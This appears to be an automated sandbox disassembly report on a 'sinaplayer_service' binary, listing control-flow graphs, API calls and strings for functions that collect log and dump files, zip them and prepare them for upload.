                                                                                                                                                                                                    control_flow_graph 1714 379460-3794eb call 377160 call 376790 1719 3798a7 1714->1719 1720 3794f1-379550 call 375100 ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z ??4FilePath@base@@QAEAAV01@ABV01@@Z ??1FilePath@base@@QAE@XZ 1714->1720 1722 3798ae-379a0e ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ GetCurrentThreadId GetTickCount call 3718e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 * 3 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z call 3718e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 * 2 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z call 375c50 1719->1722 1725 379552-37955a ??3@YAXPAX@Z 1720->1725 1726 37955d-379575 ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z 1720->1726 1766 379a12-379a1d OutputDebugStringA 1722->1766 1767 379a10 1722->1767 1725->1726 1728 379577-3795be ?BaseName@FilePath@base@@QBE?AV12@XZ ?Append@FilePath@base@@QBE?AV12@ABV12@@Z ?CopyFileW@base@@YA_NABVFilePath@1@0@Z ??1FilePath@base@@QAE@XZ * 2 1726->1728 1729 3795c0-3795d4 call 379f20 1726->1729 1728->1728 1728->1729 1736 3795d6-3795dc 1729->1736 1737 3795de 1729->1737 1739 3795e4-37962b ?SysUTF8ToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z call 3764c0 1736->1739 1737->1739 1745 37962d-379638 ??3@YAXPAX@Z 1739->1745 1746 37963b-37965e 1739->1746 1745->1746 1748 379664-3796c5 ?BaseName@FilePath@base@@QBE?AV12@XZ ?RemoveExtension@FilePath@base@@QBE?AV12@XZ call 376510 call 376470 call 374e40 1746->1748 1749 379722-3797ad call 3803d0 ?SysNativeMBToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z call 3764c0 call 376470 call 374e40 1746->1749 1772 3796c7-3796cf ??3@YAXPAX@Z 1748->1772 1773 3796d2-3796ea 1748->1773 1779 3797af-3797b7 ??3@YAXPAX@Z 1749->1779 1780 3797ba-3797d2 1749->1780 1770 379a1f-379a27 ??3@YAXPAX@Z 1766->1770 1771 379a2a-379a66 1766->1771 1767->1766 1770->1771 1775 379a84-379afd ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ 1771->1775 1776 379a68-379a81 ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ ??3@YAXPAX@Z 1771->1776 1772->1773 1777 3796f7-37971d ??1FilePath@base@@QAE@XZ * 2 1773->1777 1778 3796ec-3796f4 ??3@YAXPAX@Z 1773->1778 1781 379aff-379b19 ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ 1775->1781 1782 379b3a-379b5b call 397604 1775->1782 1776->1775 1783 379819-379860 ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z ??4FilePath@base@@QAEAAV01@ABV01@@Z ??1FilePath@base@@QAE@XZ call 3809e0 1777->1783 1778->1777 1779->1780 1784 3797d4-3797dc ??3@YAXPAX@Z 1780->1784 1785 3797df-3797f7 1780->1785 1786 379b31-379b37 ??3@YAXPAX@Z 1781->1786 1787 379b1b 1781->1787 1797 379862-379884 ?GetFileSize@base@@YA_NABVFilePath@1@PA_J@Z 1783->1797 1798 37988a-379895 1783->1798 1784->1785 1790 379804-37980c 1785->1790 1791 3797f9-379801 ??3@YAXPAX@Z 1785->1791 1786->1782 1792 379b20-379b29 ??1FilePath@base@@QAE@XZ 1787->1792 1790->1783 1795 37980e-379816 ??3@YAXPAX@Z 1790->1795 1791->1790 1792->1792 1796 379b2b 1792->1796 1795->1783 1796->1786 1797->1798 1798->1722 1799 379897-3798a5 ??3@YAXPAX@Z 1798->1799 1799->1722
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00376790: ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(vector<T> too long,8285FFAB,00000000,00000000,00000000,00000000,0000006C,8285FFAB,00000000,0000003C,00000000), ref: 0037682D
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,dmp_temp,00000008,?,?,?,00000000,0000006C,8285FFAB,00000000,0000003C,00000000), ref: 00379523
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 00379539
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00379546
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00379555
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(-00000054), ref: 0037955E
                                                                                                                                                                                                    • ?BaseName@FilePath@base@@QBE?AV12@XZ.BASE(?), ref: 0037957D
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV12@@Z.BASE(?,00000000), ref: 00379592
                                                                                                                                                                                                    • ?CopyFileW@base@@YA_NABVFilePath@1@0@Z.BASE(?,00000000), ref: 0037959E
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003795AE
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003795B7
                                                                                                                                                                                                    • ?SysUTF8ToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z.BASE(?,?), ref: 00379604
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00379633
                                                                                                                                                                                                    • ?BaseName@FilePath@base@@QBE?AV12@XZ.BASE(?), ref: 0037966E
                                                                                                                                                                                                    • ?RemoveExtension@FilePath@base@@QBE?AV12@XZ.BASE(?), ref: 0037967E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000000,00000000,000000FF), ref: 003796CA
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000000,00000000,000000FF), ref: 003796EF
                                                                                                                                                                                                      • Part of subcall function 003803D0: GetTickCount.KERNEL32 ref: 003803ED
                                                                                                                                                                                                      • Part of subcall function 003803D0: _time64.MSVCR120 ref: 003803F7
                                                                                                                                                                                                      • Part of subcall function 003803D0: UuidCreate.RPCRT4(?), ref: 00380410
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE(00000000,00000000,000000FF), ref: 00379712
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037971B
                                                                                                                                                                                                    • ?SysNativeMBToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z.BASE(?,?,00000000), ref: 00379766
                                                                                                                                                                                                      • Part of subcall function 00374E40: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,00374F50,?,?,?,?,?,?,003722E9,?,?,00000000), ref: 00374E5A
                                                                                                                                                                                                      • Part of subcall function 00374E40: ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,?,?,00374F50,?,?,?,?,?,?,003722E9,?,?,00000000), ref: 00374E7E
                                                                                                                                                                                                      • Part of subcall function 00374E40: memcpy.MSVCR120(?,?,00000000,?,00000000,?,?,?,?,00374F50,?,?,?,?,?), ref: 00374EC3
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000000,00000000,000000FF), ref: 003797B2
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000000,00000000,000000FF), ref: 003797D7
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000000,00000000,000000FF), ref: 003797FC
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000,00000000,00000000,000000FF), ref: 00379811
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,00000000,00000000,000000FF), ref: 00379827
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037983A
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00379847
                                                                                                                                                                                                    • ?GetFileSize@base@@YA_NABVFilePath@1@PA_J@Z.BASE(?,?), ref: 00379875
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037989D
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(?,?,?,00000000,0000006C,8285FFAB,00000000), ref: 003798C8
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 003798EB
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00379925
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00379962
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00379982
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,00000000), ref: 0037999F
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,00000000), ref: 003799C2
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 003799D3
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_N@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003799ED
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003799F5
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00379A13
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00379A22
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00379A6E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00379A7C
                                                                                                                                                                                                    • ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP120(00000000,00000000,00000000), ref: 00379A90
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00379AD1
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00379ADD
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 00379AE9
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 00379B05
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00379B22
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00379B32
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$U?$char_traits@$Path@base@@$D@std@@@std@@$??3@$V01@$V12@$??6?$basic_ostream@U?$char_traits@_$V?$allocator@_V?$basic_string@_W@std@@$Append@StringV01@@$BaseBasicCountCreateD@2@@std@@@1@@D@std@@Name@Piece@TickV?$allocator@V?$basic_string@W@2@@std@@W@2@@std@@@W@base@@Wide@base@@Xlength_error@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@?pptr@?$basic_streambuf@?setg@?$basic_streambuf@CopyCurrentD00@D@std@@@1@@DebugDirectoryExtension@NativeOutputPath@1@Path@1@0@Path@1@@RemoveSize@base@@ThreadUnlock@?$basic_streambuf@UuidV01@_V12@@V?$basic_streambuf@W@std@@@std@@Xout_of_range@std@@_time64memcpy
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $.zip$CopyAndZip bret = $dmp_temp$upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 4082716852-2813645332
                                                                                                                                                                                                    • Opcode ID: a746d37a563961ecc5dbec98353826739fdb4d62a4e82ce89ebe82b3c3661dc6
                                                                                                                                                                                                    • Instruction ID: d19fa2d2f5518937ee7f699bb8aad956d7557424c3122bbb3fe9efaa48c406fc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a746d37a563961ecc5dbec98353826739fdb4d62a4e82ce89ebe82b3c3661dc6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5128871C00258EFDF22DBA4CC49BDEBBB8BF15304F144199E409A7291DB756A88CF62
                                                                                                                                                                                                    Function 00378EC0 Relevance: 96.6, APIs: 48, Strings: 7, Instructions: 356COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1800 378ec0-378f4a call 375100 ??0FileEnumerator@base@@QAE@ABVFilePath@1@_NHABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z 1803 378f57-378f9f ?Next@FileEnumerator@base@@QAE?AVFilePath@2@XZ ?empty@FilePath@base@@QBE_NXZ ??1FilePath@base@@QAE@XZ 1800->1803 1804 378f4c-378f54 ??3@YAXPAX@Z 1800->1804 1805 378fa5-378fab 1803->1805 1806 37904b-379094 call 375100 ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z 1803->1806 1804->1803 1807 378fb0-379045 ?GetInfo@FileEnumerator@base@@QBE?AVFileInfo@12@XZ ?GetName@FileInfo@FileEnumerator@base@@QBE?AVFilePath@3@XZ ?Append@FilePath@base@@QBE?AV12@ABV12@@Z call 37e350 ??1FilePath@base@@QAE@XZ * 2 ??1FileInfo@FileEnumerator@base@@QAE@XZ ?Next@FileEnumerator@base@@QAE?AVFilePath@2@XZ ?empty@FilePath@base@@QBE_NXZ ??1FilePath@base@@QAE@XZ 1805->1807 1811 379096-37909e ??3@YAXPAX@Z 1806->1811 1812 3790a1-3790f9 call 375100 ??0FileEnumerator@base@@QAE@ABVFilePath@1@_NHABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z 1806->1812 1807->1806 1811->1812 1816 379106-379142 ?Next@FileEnumerator@base@@QAE?AVFilePath@2@XZ ?empty@FilePath@base@@QBE_NXZ ??1FilePath@base@@QAE@XZ 1812->1816 1817 3790fb-379103 ??3@YAXPAX@Z 1812->1817 1818 379200-37937e ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ GetCurrentThreadId GetTickCount call 3718e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 * 3 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z call 3718e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 * 2 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z call 375c50 1816->1818 1819 379148-37915a 1816->1819 1817->1816 1839 379382-37938d OutputDebugStringA 1818->1839 1840 379380 1818->1840 1820 379160-3791fa ?GetInfo@FileEnumerator@base@@QBE?AVFileInfo@12@XZ ?GetName@FileInfo@FileEnumerator@base@@QBE?AVFilePath@3@XZ ?Append@FilePath@base@@QBE?AV12@ABV12@@Z call 37e350 ??1FilePath@base@@QAE@XZ * 2 ??1FileInfo@FileEnumerator@base@@QAE@XZ ?Next@FileEnumerator@base@@QAE?AVFilePath@2@XZ ?empty@FilePath@base@@QBE_NXZ ??1FilePath@base@@QAE@XZ 1819->1820 1820->1818 1841 37938f-379397 ??3@YAXPAX@Z 1839->1841 1842 37939a-379458 call 374db0 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ ??1FileEnumerator@base@@QAE@XZ ??1FilePath@base@@QAE@XZ ??1FileEnumerator@base@@QAE@XZ call 397604 1839->1842 1840->1839 1841->1842
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0FileEnumerator@base@@QAE@ABVFilePath@1@_NHABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(0000003C,00000001,00000001,?,*.log*,00000006,8285FFAB,00000000,0000003C,00000000), ref: 00378F3C
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00378F4F
                                                                                                                                                                                                    • ?Next@FileEnumerator@base@@QAE?AVFilePath@2@XZ.BASE(?), ref: 00378F7B
                                                                                                                                                                                                    • ?empty@FilePath@base@@QBE_NXZ.BASE ref: 00378F83
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00378F9B
                                                                                                                                                                                                    • ?GetInfo@FileEnumerator@base@@QBE?AVFileInfo@12@XZ.BASE(?), ref: 00378FBD
                                                                                                                                                                                                    • ?GetName@FileInfo@FileEnumerator@base@@QBE?AVFilePath@3@XZ.BASE(?), ref: 00378FCD
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV12@@Z.BASE(?,00000000), ref: 00378FDF
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE(00000000), ref: 00378FFC
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00379005
                                                                                                                                                                                                    • ??1FileInfo@FileEnumerator@base@@QAE@XZ.BASE ref: 00379011
                                                                                                                                                                                                    • ?Next@FileEnumerator@base@@QAE?AVFilePath@2@XZ.BASE(?), ref: 00379021
                                                                                                                                                                                                    • ?empty@FilePath@base@@QBE_NXZ.BASE ref: 00379029
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037903B
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,acclog,00000006), ref: 00379086
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00379099
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$Enumerator@base@@$Info@$??3@?empty@Append@Next@Path@2@U?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@$Info@12@Name@Path@1@_Path@3@V12@@
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $*.log$*.log*$CollectLog vec_log_files_.size() = $acclog$upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 659123788-215315543
                                                                                                                                                                                                    • Opcode ID: 04f1f496fbb441d9900e44b26f5a601400d272c83656f9ebe134371dd612553f
                                                                                                                                                                                                    • Instruction ID: 84d29020d3b4a40f8b0afa10ef9828ce6b5d039a9bb25091977bf90960f58833
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04f1f496fbb441d9900e44b26f5a601400d272c83656f9ebe134371dd612553f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65F17A71900249DFDF26EBA4DC49BEDBBB8BF14304F048199E449A7281DF756A48CFA1
                                                                                                                                                                                                    Function 0037CBF0 Relevance: 77.3, APIs: 37, Strings: 7, Instructions: 342threadwindowCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 2244 37cbf0-37cdd0 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ GetCurrentThreadId GetTickCount call 3718e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 * 3 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z call 3718e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z call 3718e0 * 2 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_N@Z call 3718e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z call 375c50 2263 37cdd4-37cddf OutputDebugStringA 2244->2263 2264 37cdd2 2244->2264 2265 37cde1-37cde9 ??3@YAXPAX@Z 2263->2265 2266 37cdec-37ce59 call 374db0 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ 2263->2266 2264->2263 2265->2266 2269 37ce5f-37ce66 2266->2269 2270 37d0b8-37d0c6 2266->2270 2271 37ce6c-37ce78 2269->2271 2272 37d099-37d0a3 2269->2272 2273 37d0f2-37d0fd 2270->2273 2274 37d0c8-37d0ca 2270->2274 2277 37cfef-37d01e call 377160 call 376790 2271->2277 2278 37ce7e-37ceb3 call 371e10 ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z 2271->2278 2275 37d0a5 2272->2275 2276 37d0af-37d0b6 call 37c600 2272->2276 2290 37d102-37d11d call 397604 2273->2290 2279 37d0d3-37d0d5 2274->2279 2280 37d0cc-37d0d1 2274->2280 2275->2276 2276->2290 2298 37d036-37d049 2277->2298 2299 37d020-37d031 ?DeleteFileW@base@@YA_NABVFilePath@1@_N@Z 2277->2299 2291 37ceb5-37cebd ??3@YAXPAX@Z 2278->2291 2292 37cec0-37ceef ?DeleteFileW@base@@YA_NABVFilePath@1@_N@Z ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z 2278->2292 2279->2273 2284 37d0d7-37d0eb memmove 2279->2284 2280->2274 2280->2279 2284->2273 2291->2292 2295 37cef5-37cf43 ?BaseName@FilePath@base@@QBE?AV12@XZ ?Append@FilePath@base@@QBE?AV12@ABV12@@Z ?Move@base@@YA_NABVFilePath@1@0@Z ??1FilePath@base@@QAE@XZ * 2 2292->2295 2296 37cf9b-37cfa2 2292->2296 2300 37cf45-37cf88 ?BaseName@FilePath@base@@QBE?AV12@XZ ?Append@FilePath@base@@QBE?AV12@ABV12@@Z ?CopyFileW@base@@YA_NABVFilePath@1@0@Z ??1FilePath@base@@QAE@XZ * 2 2295->2300 2301 37cf8a-37cf8f 2295->2301 2302 37cfa4-37cfbb MessageBoxW 2296->2302 2303 37cfdf-37cfe9 ??1FilePath@base@@QAE@XZ 2296->2303 2298->2276 2305 37d04b-37d05c ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ 2298->2305 2299->2299 2304 37d033 2299->2304 2300->2301 2301->2295 2306 37cf95 2301->2306 2302->2303 2307 37cfbd-37cfd7 2302->2307 2303->2277 2304->2298 2308 37d072-37d097 ??3@YAXPAX@Z call 37c600 2305->2308 2309 37d05e 2305->2309 2306->2296 2307->2303 2308->2290 2310 37d060-37d06d ??1FilePath@base@@QAE@XZ 2309->2310 2310->2310 2313 37d06f 2310->2313 2313->2308
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 0037CC68
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037CC8E
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037CCC8
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037CD13
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037CD33
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037CD50
